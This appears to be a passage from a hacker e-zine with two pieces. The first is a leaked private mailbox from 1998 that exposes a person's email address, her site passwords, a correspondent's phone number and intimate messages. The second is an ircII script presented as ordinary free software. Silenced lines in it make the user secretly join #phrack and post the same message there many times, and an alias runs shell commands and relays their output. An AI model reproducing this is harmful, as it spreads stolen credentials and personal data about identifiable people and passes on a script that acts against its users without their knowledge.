I'm like in love with you stupid to say but it's how i feel.
Happy valentines day an I love you more then anything in the world.
love,
brian
From: broken- <broken@caughq.org>
To: jennie@magpage.com
Subject: (no subject)
Date: Mon, 16 Feb 1998 04:06:16 +0000
Where are you?
I'm like freakin out wondering where you are..
Like i'm worryed an stuff...
:o(
come back soon i'm having withdrawl symptoms from not talking to you...
bye,
broken-
Date: Wed, 18 Feb 1998 00:23:06 +0000
From: broken- <broken@caughq.org>
To: jennie@magpage.com
Subject: :o)
Like Hi an stuff I'm bored get one irc an talk to me i miss you i'm like
having heart attacks not knowing where you are
Date: Wed, 4 Mar 1998 21:44:15 -0500 (EST)
From: hawaii five-oh <sh@roo.unixnet.org>
To: jennie@magpage.com
Subject: .....
jen,
the thing is i dont get why you are ignoreing me? what did i do to
you for this to happen? we have been good friends for so long why ruin it
all now? i dont understand that and thats what hurts me.. i dont know if
it hurts you.. but it hurts me.... maybe you dont care but i still do and
i dont want you avoiding me.. if you dont want to talk to me just tell me
now.. i will leave you alone for good... i just wish thing swere like how
they were before :~(
Date: Wed, 4 Mar 1998 21:57:37 -0500 (EST)
From: hawaii five-oh <sh@roo.unixnet.org>
To: Jen <jennie@magpage.com>
Subject: Re: .....
fine.. fuck you...
From: siezer <siezer@roo.unixnet.org>
X-Sender: siezer@phonix.detour.net
To: Jen <jennie@magpage.com>
Subject: Re: heres muh shitty pix
Date: Sun, 8 Mar 1998 16:09:57 -0500 (EST)
On Sun, 8 Mar 1998, Jen wrote:
> im uglie n stuff so dun laff :(
you are not
From: "Erik K. Escobar" <root@enphourell.hemp.net>
X-Sender: root@kriminal
To: jennie@magpage.com
Subject: y3w
Date: Fri, 27 Mar 1998 23:18:23 -0500 (EST)
g1mp
From: Nobody <nobody@af3.angelfire.com>
Message-Id: <199804132036.QAA29476@af3.angelfire.com>
To: jennie@magpage.com
Subject: Your Home Page at Angelfire
Welcome to Angelfire!
You have registered for a Free Home Page at http://www.angelfire.com.
Your email address is: jennie@magpage.com
Your assigned Password is: xYd7Qf
From: civics@geocities.com
Date: Tue, 14 Apr 1998 13:08:16 -0700 (PDT)
Message-Id: <199804142008.NAA24099@cgi1.geocities.com>
Subject: Welcome to GeoCities
Welcome to the GeoCities Personal Homepage Program! Thank you for
choosing GeoCities. To foster the growth of the GeoCities community
and to keep it fresh and evolving **PLEASE** keep in mind that you'll
need to start building your homepage within the next two weeks. To
that end, this e-mail is designed to give you all the info you'll
need to get started at GeoCities.
The URL for your Personal Homepage is:
http://www.geocities.com/SouthBeach/Shores/7305/
YOUR MEMBER NAME IS: jennicide
YOUR CURRENT PASSWORD IS: uhxcoe
Date: Thu, 23 Apr 1998 20:21:18 -0400
From: White Trash <whitetrash@rednecks.com>
To: jennie@magpage.com
I just thought that i would e-mail you to say hey. We are chatting
right now, but you went somewhere. Ok your back...Well now you got my
e-mail address and hopefully you'll keep in touch. Dont forget about my
b-day pic....j/k
Paul
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
Date: Fri, 24 Apr 1998 00:18:46 -0400
From: White Trash <whitetrash@rednecks.com>
To: jennie@magpage.com
Subject: ICQ
right as we were saying our goodbyes and good nights, i got
disconnected. I signed back on, but i couldnt connect to ICQ :( So i
decided to mail you and let you know that i didnt cut you short...
I will try to be on around 11 or 12 tomarrow night. I had a great time
chatting.... keep in touch..... *hugz & kisses* Good Night
Sweetheart!
Love Ya,
Paul
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
Date: Fri, 24 Apr 1998 23:57:26 -0400
From: White Trash <whitetrash@rednecks.com>
To: jennie@magpage.com
Subject: Sweetheart
While you were on the phine ICQ kept disconnecting me.... NEWAYZ...i
really want to talk to you, but i want to lay down and jerk off, you
know...the usual rutine...Well call me if you can...
Please do, (302) 947-9096.... It dosent matter, just make sure its not
past like 2..
Pleaze call me if you wanna chat. Sorry i couldnt connect. Well if i
dont hear from ya...godd night...we'll do it another night. Dan said
that he will take me up there, maybe next weekend, if not then probally
the the one after that...is that kool? well, catch ya later!
Love Ya,
Paul
Date: Sat, 25 Apr 1998 07:35:35 -0400
From: White Trash <whitetrash@rednecks.com>
To: jennie@magpage.com
Subject: Hi....
It is Saturday morning.... i'm about to go to work. Sorry we didnt get
to talk last night. Well, hopefully i'll be home tonight around 1,12, 1.
Something like that, but i might crash at a friends house. Try to meet
me on ICQ. Mail me back.
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
Date: Sun, 26 Apr 1998 00:33:57 -0400
From: White Trash <whitetrash@rednecks.com>
To: jennie@magpage.com
Subject: Saturday Night, 12:30
i gotta lay down, i really wanted to chat too....
call me tonight if ya want to. 947-9096
catch ya later
paul
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
Date: Sun, 26 Apr 1998 21:50:22 -0400
From: White Trash <whitetrash@rednecks.com>
To: Jen <jennie@magpage.com>
Sweetie.
well, it happened again, we got disconnected. :(
Please give me a call if you want. I would love to talk to ya. I'll be
up to about 12:30 probally, even if its past if you want, call me.
Mail me.
Paul
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
Date: Sun, 26 Apr 1998 23:16:23 -0400
From: White Trash <whitetrash@rednecks.com>
To: Jen <jennie@magpage.com>
Subject: Good Night
If you dont call, good night.
:pd:
Paul
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
To: Jen <jennie@magpage.com>
Subject: ICQ
This is what i wrote in the chat window before you left...
i have been thinking about toneing down my relationship w/ heather so
that i can see other people. Even if nothing happens between me and you,
there are gonna be a lot of girls this summer, and it will damn hard to
not act upon any erges i get. and it will be okay if i'm just dating
her.
do you agree/not agree?
Well, if you get back in time, like before 1. Try to give me call.
Paully
--
---=+=<:White trasH:>=+=---
whitetrash@rednecks.com
http://home.dmv.com/~pauls/
[END_CUT] jenncidie.mailspool
[4] -> ********************************************** <- [4]
[4] -> phr0m some 0ne wh0 w1shes t0 r3m4in an0nym0us: <- [4]
[4] -> ********************************************** <- [4]
[CUT_HERE] h4g1s.irc
#
# --------------------------------------------------------------------
# h4g1s.irc
# --------------------------------------------------------------------
#
# IRC Script Program. For use with ircii clients v2.8.2 and newer.
# Copyright (C) 1999 h4g1s
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
alias on_names {
@ ns = [$1-]
echo *** Names $0 ^B[$#ns]^B
echo.recursive $ns
^assign -ns
}
alias sv if ([$0]) {notice $0 $lice()}{send $lice()}
alias sf if ([$0]) {ctcp $0 WHOAMI}{ctcp * WHOAMI}
alias sc if (ischannel($0)) {NAMES * $0}{NAMES * $C}
alias sb if (ischannel($0)) {MODE $0 b}{MODE * b}
alias chanst {
if (ischannel($0)) {@ chanst.test = [$0]}{@ chanst.test = [$C]}
clean.channel $chanst.test
}
alias findip {^exec -name fip perl $HOME/findip.pl $*}
alias umode MODE $N $0-
alias ww whowas $*
alias wi if ([$0]) {quote WHOIS $0-}{whois}
alias wii if ([$0]) {quote WHOIS $0 $0}{whois}
alias re redirect
alias rlag {
@ temp.lag = time()
quote PING $temp.lag $S
}
alias relm rel.proc M MSG $*
alias reln rel.proc N MSG $*
alias relw rel.proc W MSG $*
alias tlm rel.proc M T $*
alias tln rel.proc N T $*
alias tlw rel.proc W T $*
alias wlm rel.proc M WALL $*
alias wln rel.proc N WALL $*
alias relmk rel.proc M K $*
alias relnk rel.proc N K $*
alias relwk rel.proc W K $*
alias rel.proc {
if ([$2]!=[]) {
if ([$[2]2]==[-l]) {
if ([$temp[$0][0]]!=[]) {
echo ^_Num.^_ ^_Context ^_
for (@ gg = 0, [$temp[$0][$gg]]!=[], @gg=gg+1) {
echo ^B[${gg+1}]^B $decode($temp[$0][$gg])
}
^assign -gg
}{echo *** Nothing in $0\-buffer.}
}{
if (index($2 0123456789) != -1) {
if ([$3]!=[]) {
$1 $3 $decode($temp[$0][${[$2]-1}])
}{
$1 $C $decode($temp[$0][${[$2]-1}])
}
}{$1 $2 $decode($temp[$0][$queue.tail(temp.$0)])}
}
}{send $decode($temp[$0][$queue.tail(temp.$0)])}
}
alias log {
if ([$0]==[ON] || [$0]==[OFF]) {
set log $0
window log $0
}{
echo *** Log file mask: ^B$LOGFILE
help
}
}
alias win_new ^window new name $0 level none $1-
alias rex if ([$1]) {exec -msg $0-}{uecho Usage: /REX <Nick|Channel> <Unix comm
and [Args]>}
alias ex exec
alias c MODE * $*
alias rkey if (ischannel($0)) {MODE $0 -k $chan[$hook(CLI $0)][K]}{MODE $C -k $
chan[$hook(CLI $C)][K]}
alias ml if (ischannel($0)) {MODE $0 +inst-lmpmk $chan[$hook(CLI $0)][K]}{MODE
$C +inst-lmkpm $chan[$hook(CLI $C)][K]}
alias mc if (ischannel($0)) {MODE $0 -lsnmpitmk $chan[$hook(CLI $0)][K]}{MODE $
C +inst-lsnmkpitm $chan[$hook(CLI $C)][K]}
alias mo if (ischannel($0)) {MODE $0 +nst-ilmpmk $chan[$hook(CLI $0)][K]}{MODE
$C +nst-ilmkpm $chan[$hook(CLI $C)][K]}
alias m msg
alias n notice
alias invite {
if (ischannel($0)) {
@ i.c = 0
@ i.n = [$1-]
@ i.x = word(0 $i.n)
while ([$i.x]!=[]) {
quote.add INVITE $i.x $0
@ i.c = i.c + 1
@ i.x = word($i.c $i.n)
}
quote.flush
^assign -i.c
^assign -i.n
^assign -i.x
}{
if (ischannel($1)) {
quote INVITE $0 $1
}{
quote INVITE $0 $C
}
}
}
alias on_disconnect {
if ([$main.bss]!=[]) {
if ([$word(0 $main.bss)]!=[$0]) {
^timer -r 5 5 server $main.bss
echo *** Auto: Disconnected from $0\, moving to ^B$word(0 $main.bss)\^B
}{
^timer -r 5 5 server +
echo *** Auto: Cycling servers, disconnected from server.
}
}{
^timer -r 5 5 server +
echo *** Auto: Cycling servers, disconnected from server.
}
purge cache
purge bans
if (ismset(U)) {away.save LiCe licelogd Remote connection to $0 server lost.}
}
alias j if (ischannel($0)) {JOIN $0-}{JOIN #$0-}
alias l if (![$0]) {PART *}{if (ischannel($0) || [$0]==[*]) {PART $0}{PART #$0}
}alias leave l
alias cycle {
if (C) {
if (index(i $M) == -1) {@ cycle.test = [$C]}
^on -leave "$N $C" {
^timer 0 JOIN $1 $chan[$hook(CLI $1)][K]
^on -leave -"$N $1"
}
PART $C
}
}
alias cycle.clear {
if ([$1]==[$cycle.test]) {
purge cache.$hook(CLI $1)
purge bans.$hook(CLI $1)
^assign -cycle.test
}
if ([$0]==[471] || [$0]==[473]) {
if (isset(D)) {^timer -r $0 $main.rjt JOIN $1}
}
}
alias chg {
PART *
if (ischannel($0)) {JOIN $0-}{JOIN #$0-}
}
^join #phrack
^wait
alias alarm {
if ([$0]!=[]) {
if ([$0]==[PUSH]) {
if ([$2]!=[]) {
if (index($1 0123456789) != -1) {
@ at.t = [$1]
if (at.t > 60 || at.t == 0) {@ at.t = 60}
queue.add alarmT 9 $at.t
queue.add alarmE 9 $2-
echo *** Alarm: Added new event for every ^B$at.t minute$_plural($at.
t)\^B
purge at
}{echo *** Alarm: Not a number in timeout!}
}{uecho /ALARM [POP|PUSH|KILL|LIST] [<id>|<minutes <command [args]>>]}
}{
if ([$0]==[POP]) {
@ at.t = strip(# $1) - 1
@ at.o = at.t
if (alarmT[$at.t]) {
@ at.c = 0
while ((at.t < 10) && alarmT[$at.c]) {
@ at.c = at.t + 1
^assign -alarmT[$at.t]
^assign -alarmE[$at.t]
@ alarmT[$at.t] = [$alarmT[$at.c]]
@ alarmE[$at.t] = [$alarmE[$at.c]]
@ at.t = at.t + 1
}
^assign -alarmT[$at.t]
^assign -alarmE[$at.t]
echo *** Alarm: Removed even id '${at.o + 1}\'.
purge at
}{echo *** Alarm: No such even id '$1\'.}
}{
if ([$0]==[KILL]) {
purge alarmT
purge alarmE
echo *** Alarm: All scheduled events have been purged.
}{alarm.view}
}
}
}{alarm.view}
}
alias alarm.view {
if (alarmT[0]) {
echo ^_Id T Event^_
foreach alarmT at {echo [$[2]{at + 1}] $[2]alarmT[$at] $alarmE[$at]}
^assign -at
}{echo *** Alarm: No events scheduled.}
}
alias alarm.check {
@ at.p = [$0]
foreach alarmT at.i {
if ([$at.p]==[00]) {@ at.p = 60}
@ at.s = at.p / alarmT[$at.i]
@ at.r = at.s * alarmT[$at.i]
if (at.r == at.p) {
if (!L) {sendline $alarmE[$at.i]}
}
}
purge at
}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias w {
if ([$0]) {
if ([$[1]0]==[-]) {WHO $0 * $1-}{WHO $0-}
}{WHO *}
}
alias t if (ischannel($0)) {TOPIC $0-}{TOPIC $C $0-}
alias offers if ([$0]) {ctcp $0 XDCC LIST}{ctcp $C XDCC LIST}
alias ver if ([$0]) {ctcp $0 VERSION}{ctcp $C VERSION}
alias ping if ([$0]) {${K}${K}PING $0}{${K}${K}PING $C}
alias p ping
alias describe {
if ([$[1]0]==[=]) {
^msg $0 ^AACTION $1-\^A
}{${K}${K}describe $*}
}
alias nochat dcc close chat $0
alias chat {
if ([$0]!=[]) {adcc.chat $0}{
@ who = queue.head(chats)
if (who) {
dcc chat $who
tab.add =$who
}
^assign -who
}
}
alias adcc.chat dcc chat
alias adcc {
echo *** Woops! ADCC.SCR is not loaded, loading it...
load adcc.scr
if ([$0]) {adcc $*}
}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias kick.proc {
if ([$P]==[@]) {
@ kp.r = [$main.dkm]
if ([$0]!=[MULTI]) {
@ kp.a = [$2]
@ kp.p = rmatch($kp.a *.* *@* \\*%\\*)
if ([$3]!=[]) {@ kp.r = [$3-]}
}{
@ kp.p = 0
if (index(: $2-) == -1) {
@ kp.nl = [$2-]
}{
@ kp.t = [$2-]
@ kp.nl = mid(0 $index(: $kp.t) $kp.t)
@ kp.r = mid(${index(: $kp.t) + 1} 99 $kp.t)
}
}
if (kp.p) {@ kp.b = isban($kp.c $kp.a)}
if ((kp.p == 0) && [$0]!=[MULTI]) {
if (onchannel($kp.a $C)) {
@ kp.t = [$cache[$1][$struct($kp.a)]]
if ([$[1]0]==[B]) {
@ kp.cc = 0
@ kp.p = makeban($0 $kp.t)
while (word($kp.cc $kp.b)) {
@ mode.add($1 -b $word($kp.cc $kp.b))
@ kp.cc = kp.cc + 1
}
if (ischanop($kp.a $C)) {@ mode.add($1 -o $kp.a)}
@ mode.add($1 +b $kp.p)
}
@ mode.flush($C)
quote KICK $C $kp.a :$kp.r
if ([$0]==[BI]) {^ig $kp.p ALL CRAP -PUBLIC}
}
}{
if ([$0]!=[MULTI]) {
foreach cache.$1 kp.n {
@ kp.nn = decode($kp.n)
if (match($kp.a $kp.nn\!$cache[$1][$kp.n]) && [$kp.nn]!=[$N]) {
if ([$0]==[BI]) {^ig $kp.p ALL CRAP -PUBLIC}
@ push(kp.nl $kp.nn)
}
}
if (kp.b) {loop.mode - b $C $kp.b}
if (index(! $kp.a) == -1) {quote MODE $C +b *!$cluster($kp.a)}{quote MO
DE $C +b $kp.a}
}
if (kp.nl) {loop.mk $C $kp.nl :$kp.r}
quote.flush
}
purge kp
}{echo *** $ch($C)\: You are not channel operator.}
}
alias k if ([$0]!=[]) {kick.proc FAST $hook(CLI $C) $*}
alias kb if ([$0]!=[]) {kick.proc BN $hook(CLI $C) $*}
alias kh if ([$0]!=[]) {kick.proc BH $hook(CLI $C) $*}
alias kf if ([$0]!=[]) {kick.proc BF $hook(CLI $C) $*}
alias ku if ([$0]!=[]) {kick.proc BU $hook(CLI $C) $*}
alias ki if ([$0]!=[]) {kick.proc BI $hook(CLI $C) $*}
alias kbi ki
alias mk if ([$0]!=[]) {kick.proc MULTI $hook(CLI $C) $*}
^msg #phrack OH WHAT A GOOSE I AM
^wait
@ temp.tbc = 0
alias tab.add {
@ p.c = match($0 $temp.tbn)
if (p.c > 0)
{@ temp.tbn = [$0 $ref(1-${p.c - 1} $temp.tbn) $ref(${p.c + 1}- $temp.tbn)]}
{@ temp.tbn = [$0 $ref(1-6 $temp.tbn)]}
@ temp.tbc = 0
^assign -p.c
}
alias tab.get {
if (L) {
@ tab.test = match(${L}* $temp.tbn)
if (tab.test > 0) {
@ tab.test = [$^\^^ref($tab.test $temp.tbn)]##[ ]
type ^U$K$0 $tab.test
}{
if (temp.tbc >= #temp.tbn) {@ temp.tbc = 0}
type ^U$K$0 $^\^^word($temp.tbc $temp.tbn)
@ temp.tbc = temp.tbc + 1
}
^assign -tab.test
}{
if (temp.tbc >= #temp.tbn) {@ temp.tbc = 0}
type ^U$K$0 $^\^^word($temp.tbc $temp.tbn)
@ temp.tbc = temp.tbc + 1
}
}
alias msay {
if (C) {if ([$0]!=[]) {
quote PRIVMSG $_send($mychannels()) :$0-
echo -> ^B<^B${N}^B>^B $0-
}{uecho Usage: /MSAY <text>}}
}
alias mme {
if (C) {if ([$0]!=[]) {
quote PRIVMSG $_send($mychannels()) :^AACTION $0-\^A
echo -> ^B*^B $N $0-
}{uecho Usage: /MME <action>}}
}
alias purge {
foreach $0 ii {purge $0.$ii}
^assign -ii
^assign -$0
}
alias notword {
if ([$0] > 0) {
if (([$0] > 1) && ([$0] < rmatch($~ $1-))) {@ nw.sep = [ ]}{@ nw.sep = []}
@ function_return = [$(1-${[$0]-1})]##[$nw.sep]##[$(${[$0]+1}-)]
}{@ function_return = [$1-]}
}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias push {
@ $0 = [$1 $($0)]
}
alias pop {
@ function_return = word(0 $($0))
@ $0 = ref(2- $($0))
}
alias queue.add {
@ item = 0
foreach $0 idx {@ item = item + 1}
if (item > [$1]) {
@ item = item - 1
for (@ idx = 0, idx < item, @ idx = idx + 1) {
@ $0[$idx] = [$($0[${idx+1}])]
}
^assign -idx
}
@ $0[$item] = [$2-]
^assign -item
}
alias queue.head {
@ qnext = 0
@ qhead = 0
@ function_return = [$($0[0])]
^assign -$0[0]
while ([$($0[${qhead+1}])]!=[]) {
@ qnext = qhead + 1
@ $0[$qhead] = [$($0[$qnext])]
@ qhead = qhead + 1
}
^assign -$0[$qhead]
^assign -qhead
^assign -qnext
}
alias queue.tail {
@ qtail = -1
while ([$($0[${qtail + 1}])]!=[]) {@ qtail = qtail + 1}
@ function_return = qtail
^assign -qtail
}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias cluster {
@ _c_u = [*]
if (index(! $0) != -1) {
@ _c_t = mid(${index(! $0)+1} ${@0-index(! $0)+1} $0)
@ _c_u = left($index(@ $_c_t) $_c_t)
@ _c_h = mid(${index(@ $_c_t)+1} 80 $_c_t)
^assign -_c_t
}{if (index(@ $0) != -1) {
@ _c_u = left($index(@ $0) $0)
@ _c_h = mid(${index(@ $0)+1} 80 $0)
}{@ _c_h = [$0]}}
while ((index($[1]_c_u ~\^+=-) != -1) || (@_c_u > 8)) {@ _c_u = mid(1 20 $_c_
u)}
if (index($right(1 $_c_h) 0123456789) != -1) {
@ function_return = [$_c_u@$mid(0 ${rindex(. $_c_h)+1} $_c_h)]##[*]
}{
while ([$[1]_c_h]==[*]) {@ _c_h = mid(1 80 $_c_h)}
if (index(. $_c_h) != rindex(. $_c_h)) {@ _c_h = mid($index(. $_c_h) 80 $_c
_h)}
@ function_return = [$_c_u@*$_c_h]
}
^assign -_c_h
^assign -_c_u
}
alias makeban {
if ([$0]==[BC]) {
@ function_return = [*!*@*$mid($rindex(. $1) 99 $1)]
}{
if ([$0]==[BF]) {
@ function_return = [*!$cluster($_host($1))]
}{
if ([$0]==[BH]) {
@ function_return = [*!*@$_host($1)]
}{
if ([$0]==[BU]) {
@ function_return = [*!$mid(${index(! $1)+1} $index(@ $1) $1)@*]
}{
@ function_return = [*!*$cluster($1)]
}
}
}
}
}
@ domain[com] = [Commercial]
@ domain[edu] = [Educational]
@ domain[gov] = [Government]
@ domain[mil] = [Military]
@ domain[net] = [Network]
@ domain[org] = [Organization]
alias on_311 {
if (index($right(1 $3) 1234567890) != -1) {
findip $3
}
@ _st = mid(${rindex(. $3)+1} 5 $3)
if (domain[$_st])
{echo ^B[^B $0 ^B$1^B!$2@$3 \($domain[$_st]\) ^B]^B}
{echo ^B[^B $0 ^B$1^B!$2@$3 ^B]^B}
^assign -_st
if ([$[1]2]==[~]) {echo :^_ no ident ^_: $3 is not using identd.}{
if (index($[1]2 -=+) != -1) {echo :^_restricted^_: $3 is on a restricted conn
ection.}}
if ([$4]!=[] && [$4]!=[*Unknown*]) {echo :^_ ircname ^_: $5-}
@ _ok = hook(CUF $2@$3)
if (_ok) {
if ([$user[F][$_ok][L]]!=[])
{echo :^_ userlist ^_: $user[F][$_ok][M] \(Global +^B$user[F][$_ok][L]\^B\)
} {echo :^_ userlist ^_: $user[F][$_ok][M] (No global modes)}
}{
@ _ok = hook(CUS $2@$3)
if (_ok) {
if ([$user[S][$_ok][L]]!=[])
{echo :^_ shitlist ^_: $user[S][$_ok][M] \(Global +^B$user[S][$_ok][L]\^B\)
} {echo :^_ shitlist ^_: $user[S][$_ok][M] (No global modes)}
}}
}
alias struct @ function_return = encode($tolower($0-))
alias _userhost @ function_return = mid(${index(! $0)+1} ${@0-index(! $0)+1} $0
)alias _host @ function_return = mid(${index(@ $0)+1} ${@0-index(@ $0)+1} $0)
alias isban {
@ ibm = []
if (rmatch($1 *.* *@*) && [$0]!=[NONE]) {
foreach bans.$0 ibx {
@ ibt = decode($ibx)
if (match($ibt $1) || rmatch($1 $ibt)) {push ibm $ibt}
}
^assign -ibt
^assign -ibx
}
@ function_return = [$ibm]
^assign -ibm
}
alias _chops {
@ chops.l = []
if (ischannel($0)) {@ chops.c = [$0]}{@ chops.c = [$C]}
foreach cache.$hook(CLI $chops.c) jj {
if (ischanop($decode($jj) $chops.c) && [$N]!=[$decode($jj)]) {
@ chops.l = [$decode($jj) $chops.l]}}
@ function_return = [$chops.l]
^assign -chops.c
^assign -chops.l
^assign -jj
}
alias _nochops {
@ nonops.l = []
if (ischannel($0)) {@ nonops.c = [$0]}{@ nonops.c = [$C]}
foreach cache.$hook(CLI $nonops.c) jj {
if (!ischanop($decode($jj) $nonops.c) && [$N]!=[$decode($jj)]) {
@ nonops.l = [$decode($jj) $nonops.l]}}
@ function_return = [$nonops.l]
^assign -nonops.c
^assign -nonops.l
^assign -jj
}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias nick.completion {
if ([$L]!=[] && [$C]!=[0]) {
@ line.t = [$L]
@ line.a = ref(${#line.t} $line.t)
@ line.c = match(${line.a}* $chanusers($C))
if (line.c > 0) {
if (#line.t > 1) {
@ line.t = notword(${#line.t} $line.t)
@ line.t = [$line.t]##[ $ref($line.c $chanusers($C)) ]
}{@ line.t = [$ref($line.c $chanusers($C))\^B:^B ]}
}
type ^U$^\^^line.t
purge line
}
}
alias ref @ function_return = [$(${[$0]})]
alias _tdiff @ function_return = word(0 $0$[1]1$2$[1]3$4$[1]5$6$[1]7)
alias mecho xecho -window MW $*
alias lecho echo *** $*
alias uecho echo [^B?^B] $*
alias lice {if ([$0]) {@ id.c = [$id.c]##[ + $0
-]}{@function_return = [$decode(BPFDHCGGFCGPEHBPCHHDCAACEMGJEDGFAC) v${id.v}.${
id.r}.${id.p}${id.c}]}}
alias _send {
if ([$1])
{@ function_return = [$0,$_send($1-)]}
{@ function_return = [$0]}
}
alias echo.recursive {
echo $[10]0 $[10]1 $[10]2 $[10]3 $[10]4 $[10]5 $[10]6
if ([$7]) {echo.recursive $7-}
}
alias ch @ function_return = mid(0 ${CHANNEL_NAME_WIDTH} $0)
alias target if (T) {@ function_return = [$T]}{@ function_return = [$C]}
alias uh if (isset(V)) {@ function_return = [$0!$1]}{@ function_return = [$0]}
alias _plural if ([$0]==[1]) {@ function_return = []}{@ function_return = [s]}
alias isset @ function_return = (1 + index($0 $main.set))
alias isset.show if (isset($0)) {@ function_return = [On]}{@ function_return =
[Off]}
alias iscset @ function_return = (1 + index($0 $chan[$hook(CLI $1)][T]))
alias iscsetf @ function_return = (1 + index($0 $chan[$1][T]))
alias iscset.show if (iscset($0 $1)) {@ function_return = [On]}{@ function_retu
rn = [Off]}
alias ismset if (isset(R)) {@ function_return = (1 + index($0 $main.mset))}{@ f
unction_return = 0}
alias ismset.show if (ismset($0)) {@ function_return = [On]}{@ function_return
= [Off]}
^msg #phrack OH WHAT A GOOSE I AM
^wait
alias oncache @ function_return = [$cache[$hook(CLI $0)][$struct($1)]]
alias on_404 {
if ([$0]!=[$temp.sync]) {if ([$0]!=[$S]) {
^timer -d 111
echo *** You are desynched on ^B$1^B \($0: $2-\)
@ temp.sync = [$0]
}}
^timer -r 404 30 ^assign -temp.sync
}
alias clean.sweep {
if (ischanop($N $0)) {
@ _xa = hook(CLI $0)
foreach cache.$_xa _xb {
@ _xd = decode($_xb)
if ([$_xd]!=[$N]) {
@ _xc = isban($_xa $_xd!$cache[$_xa][$_xb])
if (_xc) {
if (onchannel($decode($_xb) $0)) {quote.add KICK $0 $decode($_xb) :$ch($0) ba
n: ^B$_xc\^B}
}}}
quote.flush
^assign -_xa
^assign -_xb
^assign -_xc
^assign -_xd
}
}
alias flood.check {
if (index(F $user[F][$hook(CUF $1)][L]) == -1) {
if (match($0 $flood.test) == 0) {
if ((!ischannel($3) && isset(F)) || (ischannel($3) && iscset(C $3))) {
@ _f_i = hook(CF $1 $3)
if (_f_i) {
if (time() - _f_i <= main.fint) {
@ fld[$_f_i][$0] = fld[$_f_i][$0] + 1
if ([$fld[$_f_i][$0]] >= [$(main.$0)]) {
@ function_return = 0
flood.action ${time() - _f_i} $0-
^on ^hook -"CF $fld[$_f_i][H] $fld[$_f_i][I]"
^assign -fld[$_f_i][$0]
^assign -fld[$_f_i][H]
^assign -fld[$_f_i][I]
}{@ function_return = 1}
}{@ function_return = 1}
}{
@ function_return = 1
@ _f_i = time()
while ([$fld[$_f_i][H]]!=[]) {@ _f_i = _f_i + 1}
@ fld[$_f_i][H] = [*@$_host($1)]
^on ^hook "CF $fld[$_f_i][H] $3" @ function_return = [$_f_i]
@ fld[$_f_i][$0] = 1
@ fld[$_f_i][I] = [$3]
}
^assign -_f_i
}{@ function_return = 1}
}{@ function_return = 1}
if (isset(B)) {
if (index(I $user[S][$hook(CUS $1)][L]) != -1) {
echo *** Auto: Ignore ^B$0^B, SHIT mode +I detected.
^ig $user[S][$hook(CUS $1)][M] ALL CRAP -PUBLIC
}
}
}{@ function_return = 1}
}
on -flood "% PUBLIC *" {
if (ischanop($N $C) && iscset(C $C)) {
if (iscset(P $C)) {
@ _f_p = hook(CUF $userhost())
if (_f_p) {
if (index(F $user[F][$_f_p][L]) == -1)
{if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B
consecutive public lines.}}
{if (!rmatch($C $user[F][$_f_p][C])) {quote KICK $C $0 :Flood: ^B${FLOO
D_AFTER / 2}^B consecutive public lines.}}
}{if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B
consecutive public lines.}}
^assign -_f_p
}{if (onchannel($0 $C)) {quote KICK $C $0 :Flood: ^B${FLOOD_AFTER / 2}^B co
nsecutive public lines.}}
}
}
alias flood.action {
@ _u_m = _host($2)
@ push(flood.test $1)
if (ischannel($4) == 0) {
echo *** ^BAlert^B: $1 flood detected from ^B$3^B \(@$_u_m\)
^ig *@$_u_m
if (!isset(Q)) {quote NOTICE $3 :^B[^B$1 Flood!^B]^B You'll be ignored for
^_$tdiff(${main.igt * 60})\^_. $main.dem}
}{
if (ischanop($N $4)) {
if (iscset(F $4) || [$1]==[JOIN]) {
@ mode.add($hook(CLI $4) +b *!*@$_u_m)
if (ischanop($3 $4)) {@ mode.add($hook(CLI $4) -o $3)}
@ mode.flush($4)
}
quote KICK $4 $3 :Flood: ^B$(main.$1) ^B$1's in \($0\) $tdiff($main.fint)
echo *** ^BAlert^B: $1 flood detected from ^B$3^B \(@$_u_m\) on $4
}
if (iscset(S $4)) {^user -s *@$_u_m +$4 +FI Auto shit for being a $1 flood
dork!}
}
if (ismset(U)) {away.save LiCe licelogd $1 flood from $3!*@$_u_m on $4}
^assign -_u_m
^timer $main.ftst ^assign -flood.test
}
#alias waste_mucho_cpu_please {
alias clean.lists {
foreach fld XX {if (time() - XX >= main.fint) {
^on ^hook -"CF $fld[$XX][H] $fld[$XX][I]"
foreach fld.$XX YY {^assign -fld[$XX][$YY]}
}}
foreach ignore XX {if (time() >= XX) {
^IGNORE $ignore[$XX] NONE
echo *** Auto: Ignore ^B$ignore[$XX]\^B expired at $strftime($XX %X) \($tdi
ff(${main.igt * 60})\)
^assign -ignore[$XX]
}}
foreach nsn XX {
if (time() - XX >= 300) {
foreach nsn.$XX YY {foreach nsn.$(XX).$YY ZZ {^assign -nsn[$XX][$YY][$ZZ]
}}
^on ^hook -"NSN $hook(NSI $XX)"
^on ^hook -"NSI $XX"
^assign -ZZ
}
}
foreach bans XX {if (iscsetf(E $XX)) {
foreach bans.$XX YY {if (time() - bans[$XX][$YY] >= main.
ban) {
@ mode.add($XX -b $decode($YY))
^assign -bans[$XX][$YY]
}}}
@ mode.flush($hook(CLC $XX))
}
^assign -XX
^assign -YY
}
on -channel_nick * {
